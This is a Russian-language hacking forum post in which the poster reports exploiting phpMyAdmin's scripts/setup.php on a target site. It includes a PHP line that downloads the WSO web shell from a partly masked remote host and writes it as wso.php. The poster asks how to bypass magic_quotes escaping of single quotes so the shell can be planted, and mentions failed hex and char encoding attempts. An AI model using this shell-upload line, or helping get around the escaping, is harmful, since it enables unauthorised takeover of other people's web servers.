18.09.2011, 01:23
|
|
Новичок
Регистрация: 08.03.2010
Сообщений: 0
С нами:
8515014
Репутация:
0
|
|
С помощью эксплойта через phpMyAdmin/scripts/setup.php
выводит phpinfo();
allow_url_fopen on
magic_quotes_gpc on
при попытке залить полноценный шелл с помощью такой конструкции
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]file_put_contents[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'wso.php'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]file_get_contents[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'http://www.*********.com/wso/******.txt'[/COLOR][COLOR="#007700"]));[/COLOR][/COLOR]
одинарная кавычка экранируется обратным слешем \'
тестил на другом сайте с такими же вышеуказанными параметрами шелл все равно заливается 8-0
пытался кавычку, часть запроса или весь запрос хексить и чарить, не помогло
Подскажите пожалуйста где я ошибся, и каким еще образом можно попытаться обойти экранирование
и залить полноценный шелл. |
|
|